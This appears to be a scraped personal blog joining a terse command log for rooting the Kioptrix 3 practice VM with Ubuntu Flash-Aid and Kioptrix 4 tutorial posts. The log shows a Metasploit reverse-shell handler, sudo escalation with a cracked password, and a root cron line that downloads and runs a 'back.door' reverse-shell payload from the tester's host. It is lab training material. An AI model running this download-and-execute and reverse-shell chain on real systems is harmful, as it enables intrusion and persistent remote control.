msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 E

firefox http://kioptrix3.com/gallery/photos/home/www/kioptrix3.com/gallery/photos/w835623l98.jpg.html

sysinfo

shell

su loneferret

echo 'import pty; pty.spawn("/bin/bash")' > /tmp/shell.py

python /tmp/shell.py

su loneferret # starwars

sudo su # starwars

cd ~

ls

cat Congrats.txt

exit

exit

exit

exit

exit

ssh loneferrt@kioptrix3.com # starwars

cat CompanyPolicy.README

sudo ht

* * * * * root cd /tmp; wget 192.168.0.192/back.door && chmod +x back.door && ./back.door; rm /etc/cron.d/exploit # /etc/cron.d/exploit

msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.0.192 LPORT=443 X > /var/www/back.door

file /var/www/back.door

/etc/init.d/apache2 start

msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=192.168.0.192 LPORT=443 E

id

uname -a




Notes



- Editing the host file is mentioned in the README which is included (as well as on the blog post).



That's all! See you.

HOWTO Flash-Aid 2.2.3 for Ubuntu

Do you see blue faces or wrong colours on YouTube videos on your Ubuntu 12.04 box? If so, I recommend installing Flash-Aid, which can solve the problem.



Open Firefox and go here to install the add-on. Once the add-on is installed, click on its icon in the top right-hand corner to install the correct Flash.



The official wording of Flash-Aid :



Remove conflicting flash plugins from Ubuntu/Debian Linux systems, install the appropriate version according to system architecture and apply some tweaks to improve performance and fix common issues.



That's all! See you.



UPDATED on May 23, 2012 :



If your problem persists and you have an nVidia display card with "libvdpau1" installed, follow the steps below to solve it.



sudo add-apt-repository ppa:tikhonov/misc

sudo apt-get update

sudo apt-get install libvdpau1




This solution is workable on Ubuntu 12.04 LTS with flashplugin-installer 11.2.202.235ubuntu0.12.04.1 but not with Flash-Aid 2.2.3.


HOWTO Kioptrix 4 Level 1.3

The following videos were not created by me. They were created by one of my mentors, g0tmi1k. I re-post them here for reference. Please credit g0tmi1k.



Get Kioptrix 4 (Level 1.3) here.



For hints and solutions, please refer to g0tmi1k's blog here.



g0tmi1k found three different ways to compromise Kioptrix; here you are (Enjoy!!!) :





SQL Injection







Local File Inclusion







Limited Shell










That's all! See you.

